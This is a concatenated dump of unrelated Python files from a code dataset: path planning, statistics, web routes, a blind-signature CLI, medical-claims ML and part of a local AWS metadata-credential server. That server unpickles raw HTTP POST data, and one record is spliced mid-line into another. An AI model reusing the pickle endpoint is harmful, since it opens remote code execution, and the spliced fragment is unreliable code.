object_radius\n self.N = num_iterations\n\n self.resolution = resolution\n self.steer_distance = steer_distance\n\n self.V = set() # 建立空集存储节点\n self.E = set() # 建立空集存储随机树\n\n self.child_to_parent_dict = dict()\n self.runForFullIterations = runForFullIterations\n self.goal_pose = self.Centroid(goal_region)\n # self.goal_pose = (goal_region.centroid.coords[0]) # 目标点\n\n def RRT(self,environment,bounds,start_pose,goal_region,object_radius,steer_distance,num_iterations,resolution, drawResults, runForFullIterations, RRT_Flavour = \"RRT\"):\n self.env = environment\n self.random_i = 0\n\n self.initialise(environment, bounds, start_pose, goal_region,object_radius, steer_distance, num_iterations,resolution, runForFullIterations)\n\n x0,y0,z0 = start_pose\n x1,y1,z1 = self.Centroid(goal_region)\n start = (x0,y0,z0) # 起点\n goal = (x1,y1,z1) # 终点\n elapsed_time = 0 # 运行时间\n path=[] # 存储路径\n\n # 考虑特殊情况\n if start == goal:\n path = [start,goal]\n self.V.union([start,goal])\n self.E.union([(start, goal)])\n # 判断是否有从起点直通终点的路径,且该路径中间是否经过障碍物\n elif self.isEdgeCollisionFree(start,goal):\n path = [start,goal] # 说明有一条路径从起点直通终点且不经过障碍物\n self.V.union([start, goal])\n self.E.union([(start, goal)])\n\n # 运行RRT算法\n else:\n if RRT_Flavour == \"RRT\":\n start_time = time.time() # 记录该算法的开始时间\n path = self.RRTSearch() # 开始进行路径搜索\n elapsed_time = time.time()-start_time # 计算算法运行时间\n\n # 画出路径\n if path and drawResults:\n draw_results(\"RRT\", path, self.V, self.E, environment, bounds, object_radius, resolution, start_pose,\n goal_region, elapsed_time)\n\n return path # 返回路径\n\n\n\n\n\n def RRTSearch(self):\n \"\"\"\n RRT路径搜索算法\n :return:\n \"\"\"\n path = [] # 定义路径\n path_length = float('inf') # 路径默认值为正无穷\n tree_size = 0\n path_size = 0\n self.V.add(self.start_pose) # start_pose肯定是路径中的一个节点那么将其加入路径中\n # goal_centroid = self.get_centroid(self.goal_region) # 获取目标图形的形心,该函数z坐标不确定对不对\n goal_centroid = self.Centroid(self.goal_region)\n\n # 迭代采样过程\n for i in range(self.N):\n if i >= self.N-1:\n self.runForFullIterations == True # 意思是迭代完了\n if(random.random()>=1.95): # 这种情况不会存在\n random_point = goal_centroid\n else:\n # 采集随机点\n random_point = self.get_cillision_free_random_point()\n nearest_point = self.find_nearest_point(random_point)\n new_point = self.steer(nearest_point,random_point)\n if self.isEdgeCollisionFree(nearest_point,new_point):\n self.V.add(new_point)\n self.E.add((nearest_point,new_point))\n self.setParent(nearest_point,new_point) # 设置nearest_point 为 new_point\n\n if self.isAtGoalRegion(new_point):\n if not self.runForFullIterations:\n path,tree_size,path_size,path_length = self.find_path(self.start_pose,new_point)\n break\n else:\n tmp_path, tmp_tree_size, tmp_path_size, tmp_path_length = self.find_path(self.start_pose,\n new_point)\n if tmp_path_length < path_length:\n path_length = tmp_path_length\n path = tmp_path\n tree_size = tmp_tree_size\n path_size = tmp_path_size\n\n uniPruningPath = self.uniPruning(path) # 这里是剪枝操作\n # If no path is found, then path would be an empty list. 
如果没有路径那么path应该是空列表。\n        return [path, uniPruningPath]\n\n\n\n\n\n\n\n\n    def Centroid(self,point_region):\n        \"\"\"\n        获取立体图形的中心\n        :return:\n        \"\"\"\n        x = (point_region[2][0] - point_region[0][0]) / 2 + point_region[0][0]\n        y = (point_region[1][1] - point_region[0][1]) / 2 + point_region[0][1]\n        z = (point_region[4][2] - point_region[0][2]) / 2 + point_region[0][2]\n        return (x, y, z)\n\n    def uniPruning(self,path):\n        \"\"\"\n        剪枝操作\n        :param path: 路径\n        :return:\n        \"\"\"\n        unidirectionalPath = [path[0]] # 起点\n        pointTem = path[0] # 起点\n        for i in range(3, len(path)): # 去掉起点,终点\n            # pointTem,path[i] 两个点连线没有障碍物\n            if not self.isEdgeCollisionFree(pointTem, path[i]):\n                pointTem = path[i - 1]\n                unidirectionalPath.append(pointTem)\n        unidirectionalPath.append(path[-1]) # path[-1] 代表path 的最后一个值\n        return unidirectionalPath\n\n\n    def find_path(self,start_point,end_point):\n        \"\"\"\n        从随机节点中选出路径\n        :param start_point:\n        :param end_point:\n        :return:\n        \"\"\"\n        path = [end_point]\n        tree_size, path_size, path_length = len(self.V), 1, 0 # tree_size 树的大小\n        current_node = end_point # 当前节点就是新加入的节点\n        previous_node = None\n        target_node = start_point # 从末端点到起点,起点就是目标点\n        while current_node != target_node:\n            parent = self.getParent(current_node) # 寻找当前节点前一个节点(父节点)\n            path.append(parent) # 插入新点\n            previous_node = current_node\n            current_node = parent # 当前节点变成向目标点进一步的节点\n            path_length += self.euclidian_dist(current_node, previous_node) # 两节点的距离,目的是求得整个路径的长度\n            path_size += 1 # 计算节点个数\n        path.reverse() # 反向列表中的元素,因为是逆序找的\n        return path, tree_size, path_size, path_length\n\n    def isAtGoalRegion(self,point):\n        \"\"\"\n        判断新点是否到达目标区域\n        :param point:\n        :return:\n        \"\"\"\n        # buffered_point = Point(point).buffer(self.obj_radius, self.resolution)\n        # intersection = buffered_point.intersection(self.goal_region) # 返回几何图形的交集\n        # inGoal = intersection.area / buffered_point.area # area几何的无单位面积\n        # return inGoal >= 0.5 # 原始定为0.5\n        # return inGoal >= 0.01\n\n        return self.euclidian_dist(point,self.goal_pose) <= 3.9 # 这里不能这么大\n\n\n\n\n\n\n    def getParent(self, vertex):\n        \"\"\"\n        返回父节点\n        :param vertex:\n        :return:\n        \"\"\"\n        return self.child_to_parent_dict[vertex]\n\n    def setParent(self,parent,child):\n        \"\"\"\n        设置父节点\n        :return:\n        \"\"\"\n        self.child_to_parent_dict[child] = parent\n\n    def steer(self,from_point,to_point):\n        \"\"\"\n        根据步长确定新增节点\n        :param from_point:最近节点(线段起点)\n        :param to_point: 随机点(线段终点)\n        :return:\n        \"\"\"\n        fromPoint_buffered = Point(from_point).buffer(self.obj_radius, self.resolution)\n        toPoint_buffered = Point(to_point).buffer(self.obj_radius, self.resolution)\n        if fromPoint_buffered.distance(toPoint_buffered) < self.steer_distance: # 两点之间的距离小于步长\n            return to_point\n        else: # 以步长为长度扩展节点\n            from_x,from_y,from_z = from_point\n            to_x,to_y,to_z = to_point\n            new_pointx = (to_x-from_x)*self.steer_distance/fromPoint_buffered.distance(toPoint_buffered) + from_x\n            new_pointy = (to_y - from_y) * self.steer_distance / fromPoint_buffered.distance(toPoint_buffered) + from_y\n            new_pointz = (to_z - from_z) * self.steer_distance / fromPoint_buffered.distance(toPoint_buffered) + from_z\n            new_point = (new_pointx,new_pointy,new_pointz)\n            return new_point\n\n\n\n\n    def find_nearest_point(self,random_point):\n        \"\"\"\n        寻找随机点的最近点\n\n        :return: 最近点\n        \"\"\"\n        closest_point = None\n        min_dist = float('inf')\n        for vertex in self.V:\n            # self.V 包含随机树上所有节点\n            euc_dist = self.euclidian_dist(random_point, vertex)\n            if euc_dist < min_dist:\n                min_dist = euc_dist\n                closest_point = vertex\n        return closest_point\n\n\n    def get_cillision_free_random_point(self):\n        \"\"\"\n        找到一个不在障碍物里的可用随机点\n        :return: 可用随机点\n        \"\"\"\n        # 运行直到找到一个有效的点\n        while True:\n            self.random_i = self.random_i +1\n            point = self.get_random_point(self.random_i)\n            buffered_point = Point(point).buffer(self.obj_radius,self.resolution)\n            # 判断随机点是否在障碍物里\n            if self.PointCollisionFree(buffered_point):\n                return point\n\n    def euclidian_dist(self,point1,point2):\n        \"\"\"\n        计算两个点之间的距离\n        :param point1:\n        :param point2:\n        :return:\n        \"\"\"\n        return math.sqrt((point2[0]-point1[0])**2 + (point2[1]-point1[1])**2 + (point2[2]-point1[2])**2)\n\n    def PointCollisionFree(self,point):\n        \"\"\"\n        判断点是否在障碍物里\n        :return:\n        \"\"\"\n        for obstacle in self.obstacles:\n            if obstacle.contains(point):\n                return False\n        return True\n\n\n    def get_random_point(self, rand_i):\n        \"\"\"\n        获取随机点的x,y,z值\n        :param random_i: 迭代次数\n        :return: 坐标值\n        \"\"\"\n        x = self.minx + LeeHalton.halton(rand_i,2)*(self.maxx-self.minx)\n        y = self.miny + LeeHalton.halton(rand_i,3)*(self.maxy-self.miny)\n        z = self.minz + LeeHalton.halton(rand_i,4)*(self.maxz-self.minz)\n        # x = self.minx + random.random() * (self.maxx - self.minx)\n        # y = self.miny + random.random() * (self.maxy-self.miny)\n        # z = self.minz + random.random() * (self.maxz-self.minz)\n        return (x,y,z)\n\n    def get_centroid(self,region):\n        \"\"\"\n        功能:获取图形的形心\n        :param region:图形\n        :return: 图形形心\n        \"\"\"\n        centroid = region.centroid.wkt\n        filtered_vals = centroid[centroid.find(\"(\")+1:centroid.find(\")\")]\n        filtered_x = filtered_vals[0:filtered_vals.find(\"\")]\n        filtered_y = filtered_vals[filtered_vals.find(\"\")+1:-1]\n        filtered_z = filtered_vals[filtered_vals.find(\"\")+1:-1]\n        (x,y,z) = (float(filtered_x),float(filtered_y),float(filtered_z))\n        return (x,y,z)\n\n\n\n\n\n\n\n\n\n\n\n\n    def isEdgeCollisionFree(self,point1,point2):\n        \"\"\"\n        # 连接两个点的直线中间是否经过障碍物,是否超出界限\n        point1,point2 为要判断的两个点\n        :param point1:\n        :param point2:\n        :return:\n        \"\"\"\n        # 判断point2是否超出了边界\n        if self.isOutofBounds(point2):\n            return False\n        line = LineString([point1,point2])\n        expanded_line = line.buffer(self.obj_radius,self.resolution)\n        for obstacle in self.obstacles:\n            if expanded_line.intersects(obstacle):\n                return False\n        return True\n\n\n    def isOutofBounds(self,point):\n        x = point[0]\n        y = point[1]\n        z = point[2]\n        # obj_radius是对象半径,就是走这个路径的对象。这里考虑了实际情况\n        if((x-self.obj_radius)<self.minx) or ((x+self.obj_radius)>self.maxx):\n            return True\n        if ((y+self.obj_radius)>self.maxy):\n            return True\n        if ((z+self.obj_radius)>self.maxz):\n            return True\n        return False\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"NewRRT/LeeRRT.py","file_name":"LeeRRT.py","file_ext":"py","file_size_in_byte":13920,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
{"seq_id":"31892452","text":"#coding=utf-8\nimport numpy as np;\nimport numpy.random as random;\nfrom scipy.stats import *\nif __name__=='__main__':\n    #A = np.ones([5])\n    #B = np.ones([4])\n    A = random.rand(4,1);\n    B = random.rand(4,1);\n    #B = A+A;\n    print(A,B)\n    #result = ranksums(A,B)\n    result = mannwhitneyu(A,B)\n    print(result)\n    print(result[1])","sub_path":"test/rank-sum-test.py","file_name":"rank-sum-test.py","file_ext":"py","file_size_in_byte":338,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
{"seq_id":"186094666","text":"from django.conf.urls import url\n\nfrom purchases import views\n\nurlpatterns = [\n    url(r'^$', views.ProductListView.as_view(), name='products'),\n    url(r'product/(?P<slug>[-\\w]+)/$', views.ProductDetailView.as_view(), name='product_detail'),\n    url(r'adding_sale', views.SaleAddingView.as_view(), 
name='adding_product_to_sale'),\n    url(r'sales', views.SaleListView.as_view(), name='sales'),\n    url(r'change_prices', views.ChangePriceListView.as_view(), name='change_prices'),\n]","sub_path":"purchases/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":479,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
{"seq_id":"430276119","text":"#################\n#### IMPORTS ####\n#################\n# import app modules\nfrom website import app, db\nfrom website.models import User, Fare\n# import flask modules\nfrom flask import Blueprint, render_template, request\n\n###################\n#### BLUEPRINT ####\n###################\nhome_blueprint = Blueprint(\n    'home', __name__,\n    template_folder='templates'\n)\n\n#################\n#### LOGICAL ####\n#################\n@home_blueprint.route('/')\ndef home():\n    users = User.query.all()\n    fares = Fare.query.all()\n    return render_template('index.html', title='index',\n                           users=users, fares=fares)\n","sub_path":"website/home/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":624,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
{"seq_id":"369497189","text":"# coding: latin-1\n###############################################################################\n# eVotUM - Electronic Voting System\n#\n# unblindSignature-app.py\n#\n# Cripto-7.3.1 - Command line app to exemplify the usage of unblindSignature\n# function (see eccblind.py)\n#\n# Copyright (c) 2016 Universidade do Minho\n# Developed by André Baptista - Devise Futures, Lda. (andre.baptista@devisefutures.com)\n# Reviewed by Ricardo Barroso - Devise Futures, Lda. (ricardo.barroso@devisefutures.com)\n#\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.\n#\n###############################################################################\n\"\"\"\nCommand line app that receives Blind signature, Blind components and prDashComponents\nfrom STDIN and writes the unblinded signature to STDOUT.\n\"\"\"\n\nimport sys\nfrom eVotUM.Cripto import eccblind\n\n\ndef printUsage():\n print(\"Usage: python unblindSignature-app.py\")\n\ndef parseArgs():\n if (len(sys.argv) > 1):\n printUsage()\n else:\n main()\n\ndef showResults(errorCode, signature):\n print(\"Output\")\n if (errorCode is None):\n print(\"Signature: %s\" % signature)\n elif (errorCode == 1):\n print(\"Error: pRDash components are invalid\")\n elif (errorCode == 2):\n print(\"Error: blind components are invalid\")\n elif (errorCode == 3):\n print(\"Error: invalid blind signature format\")\n\ndef main():\n print(\"Input\")\n blindSignature = raw_input(\"Blind signature: \")\n blindComponents = raw_input(\"Blind components: \")\n pRDashComponents = raw_input(\"pRDash components: \")\n errorCode, signature = eccblind.unblindSignature(blindSignature, pRDashComponents, blindComponents)\n showResults(errorCode, signature)\n\nif __name__ == \"__main__\":\n parseArgs()\n","sub_path":"TPraticas/Aula3/BlindSignature/unblindSignature-app.py","file_name":"unblindSignature-app.py","file_ext":"py","file_size_in_byte":2401,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"487502714","text":"import tensorflow as tf\n# assign_add 的作用 以及 每个操作节点的依赖关系\na = tf.Variable(1.0, name=\"a\")\na_plus_1 = tf.assign_add(a,1,name=\"a_plus\")\n# y = a_plus_1\nwith tf.control_dependencies([a_plus_1]):\n y = a\ninit = tf.global_variables_initializer()\nwith tf.Session() as sess:\n sess.run(init)\n print(a.eval())\n print(a_plus_1.eval())\n print(a.eval())\n print(\"--------------\")\n for i in range(5):\n print(y.eval())","sub_path":"day01/tensor_04.py","file_name":"tensor_04.py","file_ext":"py","file_size_in_byte":458,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"118004654","text":"from __future__ import print_function\nimport tensorflow as tf\nfrom keras.callbacks import LambdaCallback\nfrom keras.models import Model, load_model, Sequential\nfrom keras.layers import Dense, Activation, Dropout, Input, Masking\nfrom keras.layers import LSTM\nfrom keras.utils.data_utils import get_file\nfrom keras.preprocessing.sequence import pad_sequences\nimport sys\nimport io\nimport pandas as pd\nfrom sklearn.linear_model import LogisticRegression\nimport numpy as np\nfrom sklearn.utils import shuffle\nfrom sklearn.metrics import auc\nfrom sklearn.metrics import roc_curve\nfrom matplotlib import pyplot as plt\nfrom sklearn.ensemble import RandomForestClassifier\nimport json\n\nimport math\nfrom sklearn.preprocessing import MinMaxScaler\nfrom sklearn.metrics import mean_squared_error\n\nfrom sklearn.neural_network import MLPClassifier\nfrom sklearn.model_selection import train_test_split\n\nimport logging\n\nlogging.basicConfig(filename='prediction_1.log', filemode='w', format='%(name)s - %(levelname)s - %(message)s')\n\ndir_csv = '/home/ywang86/csv/'\ns3_s4_start_csv = 'yw_1115_min_s3_s4_positive_6m.csv'\ngrouped_diags = 
'yw_1115_grouped_diags_withbilabel.csv'\nicd9_related_ckd = 'yw_icd9_list_ccs_49_50_156_157_158_161.csv'\nicd9_to_ccs = 'icd9_ccs_single_level_dx.csv'\nccs_binary = 'ccs_id_binary.csv'\nthre_ave_pa = 1\n\n\ndef csv_df(csv_name):\n\tcsv_dir = dir_csv + csv_name \n\tdf = pd.read_csv(csv_dir)\n\treturn df\n# select input features\n\ndf_s3_s4_start = csv_df(s3_s4_start_csv)\ndf_grouped_diags = csv_df(grouped_diags)\ndf_icd9_related_ckd = csv_df(icd9_related_ckd)\ndf_icd9_to_ccs = csv_df(icd9_to_ccs)\ndf_ccs_binary = csv_df(ccs_binary) \n\nlogging.critical('total number of patients is %s',df_s3_s4_start.shape[0])\n\n\ncls = df_s3_s4_start.columns.tolist()\n\ncls = df_grouped_diags.columns.tolist()\n\n\n# ----------------------- prepare data -----------------------------------------------------------------------\n# add label value \navg_duration = df_s3_s4_start['s3_s4_duration'].mean()\n\nlogging.critical(\"average duration from s3 to s4 is %s\", avg_duration)\n\nthreshold_durationg = thre_ave_pa * avg_duration\ndf_grouped_diags = df_grouped_diags.assign(bi_label=(df_grouped_diags.s3_s4_duration < threshold_durationg))\ndf_grouped_diags.fillna('[]',inplace=True)\n\ndf_grouped_diags['prncpal_group_list'] = df_grouped_diags.prncpal_group.apply(lambda x: x[1:-1].split(','))\ndf_grouped_diags['diags2_group_list'] = df_grouped_diags.diags2_group.apply(lambda x: x[1:-1].split(','))\ndf_grouped_diags['diags3_group_list'] = df_grouped_diags.diags3_group.apply(lambda x: x[1:-1].split(','))\ndf_grouped_diags['diags4_group_list'] = df_grouped_diags.diags4_group.apply(lambda x: x[1:-1].split(','))\ndf_grouped_diags['diags5_group_list'] = df_grouped_diags.diags5_group.apply(lambda x: x[1:-1].split(','))\ndf_grouped_diags['diags6_group_list'] = df_grouped_diags.diags6_group.apply(lambda x: x[1:-1].split(','))\ndf_grouped_diags['diags7_group_list'] = df_grouped_diags.diags7_group.apply(lambda x: x[1:-1].split(','))\ndf_grouped_diags['diags8_group_list'] = df_grouped_diags.diags8_group.apply(lambda x: x[1:-1].split(','))\ndf_grouped_diags['diags9_group_list'] = df_grouped_diags.diags9_group.apply(lambda x: x[1:-1].split(','))\ndf_grouped_diags['diags10_group_list'] = df_grouped_diags.diags10_group.apply(lambda x: x[1:-1].split(','))\ndf_grouped_diags['diags11_group_list'] = df_grouped_diags.diags11_group.apply(lambda x: x[1:-1].split(','))\ndf_grouped_diags['diags12_group_list'] = df_grouped_diags.diags12_group.apply(lambda x: x[1:-1].split(','))\n\ndf_grouped_diags['diags_all'] = df_grouped_diags.prncpal_group_list +df_grouped_diags.diags3_group_list+df_grouped_diags.diags4_group_list+df_grouped_diags.diags5_group_list+df_grouped_diags.diags6_group_list+df_grouped_diags.diags7_group_list+df_grouped_diags.diags8_group_list+df_grouped_diags.diags9_group_list+df_grouped_diags.diags10_group_list+df_grouped_diags.diags11_group_list+df_grouped_diags.diags12_group_list ;\n\n\n# Filter out diags after start of s3\ndf_grouped_diags['yearmonth'] = df_grouped_diags.min_dt_s3.apply(lambda x: x.split('-'))\n\n\n\ndf_grouped_diags['year_s3'] = df_grouped_diags['yearmonth'].apply(lambda x: int(x[0]))\ndf_grouped_diags['month_s3'] = df_grouped_diags['yearmonth'].apply(lambda x: int(x[1]))\n\n\n\n\ndf_grouped_diags_s3_history = df_grouped_diags[(df_grouped_diags['year_s3'] >= df_grouped_diags['yearno']) & (df_grouped_diags['month_s3']>= df_grouped_diags['monthno'])]\n\n\n\ndf_all_diags_s3_history = df_grouped_diags_s3_history.groupby('dsysrtky',as_index=False).agg({'diags_all':'sum', 'min_dt_s3': 'max', 's3_s4_duration': 
'max', 'bi_label': 'max'})\n\n\n# remove empty diag \ndf_all_diags_s3_history['diags_all_noduplicate'] = df_all_diags_s3_history.diags_all.apply(lambda x: list(filter(None,list(set(x)))))\n\nlogging.critical(df_all_diags_s3_history.head(10))\nlogging.critical(df_all_diags_s3_history.columns.tolist())\n\n# ----------------------- end of prepare data -----------------------------------------------------------------------\n\n\n# generate codebook\n\nlist_icd_ccs = df_icd9_related_ckd.icd9.tolist() + df_ccs_binary.ccs.tolist() + ['naccs'] # add a naccs for the icd that doesn't have and available ccs \ndf_codebook = pd.DataFrame({'code':list_icd_ccs})\ndf_codebook['index_col'] = df_codebook.index\n\n\ndf_icd9_to_ccs.set_index('icd9')\n\n# dict_icd9_ccs = df_icd9_to_ccs.set_index('icd9').T.to_dict('list')\n\ndict_icd9_ccs = dict(zip(df_icd9_to_ccs.icd9, df_icd9_to_ccs.ccs))\n\ndict_codebook = dict(zip(df_codebook.code, df_codebook.index_col))\n\n\ndef icd_convert(diag_list, dict_codebook,dict_icd9_ccs):\n\tconverted_diag = [0] * len(dict_codebook)\n\tfor diag in diag_list:\n\t\tif diag in df_codebook.code.tolist():\n\t\t\tcode = dict_codebook[diag]\n\t\telse:\n\t\t\tccs_code = dict_icd9_ccs.get(diag) \n# \t\t\tccs_code = df_icd9_to_ccs.loc(df_icd9_to_ccs['icd9'] == diag)\n\t\t\tif ccs_code is None:\n\t\t\t\tcode = dict_codebook['naccs']\n\t\t\telse: \n\t\t\t\tcode = dict_codebook[ccs_code]\n\n\t\tconverted_diag[code] = 1\n\treturn converted_diag\n\ndf_all_diags_s3_history['ccs_binary'] = df_all_diags_s3_history.diags_all_noduplicate.apply(lambda x: icd_convert(x,dict_codebook,dict_icd9_ccs))\n\t\t\t\n\t\t\t\nlogging.critical(\"start training\")\n\ntr, ts = train_test_split(df_all_diags_s3_history)\n\n\ndf_s1 = tr['ccs_binary']\ndf_s2 = tr[['bi_label']]\n\ntest_s1 = ts['ccs_binary']\ntest_s2 = ts[['bi_label']]\n\narray_s1 = np.array(df_s1.values.tolist())\narray_s2 = df_s2.values\n\n\ntest_array_s1 = np.array(test_s1.values.tolist())\ntest_array_s2 = test_s2.values\n\nlogging.critical(array_s1)\n# fit model\n#clf = MLPClassifier(solver='lbfgs', alpha=1e-5,hidden_layer_sizes=(5, 8), random_state=1)\nclf = MLPClassifier(activation='relu', alpha=1e-05, batch_size='lbfgs',beta_1=0.9, beta_2=0.999, early_stopping=False,epsilon=1e-08, hidden_layer_sizes=(7, 4), learning_rate='constant',learning_rate_init=0.001, max_iter=10000, momentum=0.9,nesterovs_momentum=True, power_t=0.5, random_state=1, shuffle=True,solver='lbfgs', tol=0.0001, validation_fraction=0.1, verbose=False,warm_start=False)\nclf.fit(array_s1, array_s2) \n\nlogging.critical(\"finished training\")\n\n\npredicted_result = clf.predict(array_s1)\npredicted_prob = clf.predict_proba(array_s1)\n\nlogging.critical(\"sum of predition is: %s\",sum(predicted_result))\nlogging.critical(\"sum of real result is: %s\",sum(array_s2))\n\nerror_num_1 = 0\nerror_num_0 = 0\n\nfor i in range(len(array_s2)):\n if (predicted_result[i]!= array_s2[i]) and (array_s2[i] == 1):\n error_num_1 = error_num_1 + 1\n elif (predicted_result[i]!= array_s2[i]) and (array_s2[i] == 0):\n \terror_num_0 = error_num_0 + 1\n #logging.critical(\"predict\",i, \" wrong, real case is\",array_s2[i],\" with prob \", predicted_prob[i])\n #elif predicted_result[i] == 1:\n # logging.critical(\"predict\", i, \" right, real case is\",array_s2[i],\" with prob \", predicted_prob[i])\naccuracy_score = clf.score(array_s1, array_s2, sample_weight=None)\nlogging.critical(\"accuracy_score is: %s\",accuracy_score)\nlogging.critical(\"1-recall is %s\", 
error_num_1/len(array_s2))\nlogging.critical(\"1-precision is %s\", error_num_0/len(array_s2)) \nlogging.critical(\"high use rate is %s\", sum(array_s2)/len(array_s2))\n \n\n\nlogging.critical('**********auc analysis***********')\n\nprobs = clf.predict_proba(array_s1)\nfpr, tpr, thresholds = roc_curve(array_s2, probs[:,1])\nauc_rf = auc(fpr,tpr)\n\nlogging.critical('auc for logistic regression is %s',auc_rf)\n\n\n\nlogging.critical('******************** TEST PART************************')\npredicted_result = clf.predict(test_array_s1)\npredicted_prob = clf.predict_proba(test_array_s1)\n\nlogging.critical(\"sum of predition is: %s\",sum(predicted_result))\nlogging.critical(\"sum of real result is: %s\",sum(test_array_s2))\n\nerror_num_1 = 0\nerror_num_0 = 0\n\nfor i in range(len(test_array_s2)):\n if (predicted_result[i]!= test_array_s2[i]) and (test_array_s2[i] == 1):\n error_num_1 = error_num_1 + 1\n elif (predicted_result[i]!= test_array_s2[i]) and (test_array_s2[i] == 0):\n \terror_num_0 = error_num_0 + 1\n #logging.critical(\"predict\",i, \" wrong, real case is\",array_s2[i],\" with prob \", predicted_prob[i])\n #elif predicted_result[i] == 1:\n # logging.critical(\"predict\", i, \" right, real case is\",array_s2[i],\" with prob \", predicted_prob[i])\naccuracy_score = clf.score(test_array_s1, test_array_s2, sample_weight=None)\nlogging.critical(\"accuracy_score is: %s\",accuracy_score)\nlogging.critical(\"1-recall is %s\", error_num_1/len(test_array_s2))\nlogging.critical(\"1-precision is %s\", error_num_0/len(test_array_s2)) \nlogging.critical(\"high use rate is %s\", sum(test_array_s2)/len(test_array_s2))\n\n \n\n\nlogging.critical('**********auc analysis***********')\n\nprobs = clf.predict_proba(test_array_s1)\nfpr, tpr, thresholds = roc_curve(test_array_s2, probs[:,1])\nauc_rf = auc(fpr,tpr)\n\nlogging.critical('auc for logistic regression is %s',auc_rf)","sub_path":"hap880/Code/stage_prediction.py","file_name":"stage_prediction.py","file_ext":"py","file_size_in_byte":9903,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"51595802","text":"# STU dataset\nimport os.path as osp\nimport mmcv\nimport numpy as np\nimport natsort\nimport glob\n\nfrom .custom import CustomDataset\nfrom .registry import DATASETS\n\n@DATASETS.register_module\nclass MatSTUDataset(CustomDataset):\n '''\n # custom dataset for .mat\n '''\n CLASSES = ('person',)\n\n def __init__(self, **kwargs):\n super(MatSTUDataset, self).__init__(**kwargs)\n\n def load_annotations(self, ann_file):\n # store the annnotation\n self.bboxes = mmcv.load( ann_file )\n\n if not self.test_mode:\n img_names = sorted(glob.glob( osp.join('data', \"detection_test_data\",\"*.jpg\") ))\n else:\n img_names = sorted(glob.glob(osp.join('data/detection_data', \"detection_real_test_data\",\"*.jpg\")))\n\n def dir2dict(filedir):\n # all 1024 * 768 * 3\n return dict(filename=filedir, width=1024, height=768)\n\n img_infos = list(map(lambda x: dir2dict(x), img_names))\n\n assert( len(self.bboxes) == len(img_infos) )\n\n return img_infos\n\n def get_ann_info(self, idx):\n bboxes = np.array(self.bboxes[idx], ndmin=2) - 1\n labels = np.ones(len(bboxes))\n # no bboxes_ignore\n bboxes_ignore = np.zeros((0, 4))\n labels_ignore = np.zeros((0,))\n\n ann = dict(\n bboxes=bboxes.astype(np.float32),\n labels=labels.astype(np.int64),\n bboxes_ignore=bboxes_ignore.astype(np.float32),\n labels_ignore=labels_ignore.astype(np.int64)\n )\n\n return 
ann\n\n","sub_path":"mmdet/datasets/mat_style.py","file_name":"mat_style.py","file_ext":"py","file_size_in_byte":1524,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"546255560","text":"n=int(input())\r\nl=list(map(int,input().split()))\r\nl2=[]\r\nwhile l!=[]:\r\n l.sort()\r\n l1=[]\r\n i=0\r\n while i getattr(self, \"_basic_auth_time\", datetime.utcnow()) + timedelta(hours=4):\n self._basic_auth = None\n return getattr(self, \"_basic_auth\", None)\n\n @basic_auth.setter\n def basic_auth(self, val):\n self._basic_auth = val\n self._basic_auth_time = datetime.utcnow()\n\n @property\n def keys(self):\n keys = getattr(self, \"_keys\", None)\n if keys is not None:\n expiration = parse_ts(keys[\"Expiration\"])\n if datetime.utcnow() > expiration:\n log.info(\"Keys expired, recreating them\")\n keys = None\n\n if keys is None:\n log.info(\"Assuming role\")\n pair = IamSaml(self.credentials.keys.provider, self.credentials.keys.idp_username, \"\")\n pair.basic_auth = self.basic_auth\n keys = pair.get_result(self.credentials.keys.role).credentials.to_dict()\n\n self._keys = {\n \"Code\": \"Success\"\n , \"LastUpdated\": datetime.utcnow().strftime(\"%Y-%m-%dT%H:%M:%S:00Z\")\n , \"AccessKeyId\": keys[\"access_key\"]\n , \"SecretAccessKey\": keys[\"secret_key\"]\n , \"Token\": keys[\"session_token\"]\n , \"Expiration\": keys[\"expiration\"]\n }\n return self._keys\n\n @keys.setter\n def keys(self, val):\n self._keys = val\n\n @property\n def app(self):\n try:\n from flask import Flask\n except ImportError:\n raise CredoError(\"Please pip install flask\")\n\n if getattr(self, \"_app\", None) is None:\n self._app = Flask(\"credo.server\")\n self.register_routes(self._app)\n return self._app\n\n def register_routes(self, app):\n from flask import jsonify, abort, make_response, request\n\n @app.route('/', methods = ['GET'])\n def index():\n return 'latest'\n\n @app.route('/latest/', methods = ['GET'])\n def latest():\n return 'meta-data'\n\n @app.route('/latest/meta-data/', methods = ['GET'])\n def meta_data():\n return 'iam\\nswitch'\n\n @app.route('/latest/meta-data/switch/', methods = [\"POST\"])\n def switch():\n if not request.data:\n return make_response(jsonify({\"error\": \"Need post data\"}), 500)\n obj = pickle.loads(request.data)\n basic_auth = obj.get(\"basic_auth\", self.basic_auth)\n credentials = obj[\"credentials\"]\n\n if basic_auth is None:\n return make_response(jsonify({\"error\": \"NEED_AUTH\"}), 500)\n else:\n self.basic_auth = basic_auth\n self.credentials = credentials\n self.keys = None\n\n # keys is a property that actually gets the credentials\n try:\n self.keys\n except SamlNotAuthorized:\n return make_response(jsonify({\"error\": \"BAD_PASSWORD\"}), 500)\n return \"success\"\n\n @app.route('/latest/meta-data/iam/', methods = ['GET'])\n def iam():\n return 'security-credentials'\n\n @app.route('/latest/meta-data/iam/security-credentials/', methods = ['GET'])\n def security_credentials():\n return 'BaseIAMRole'\n\n 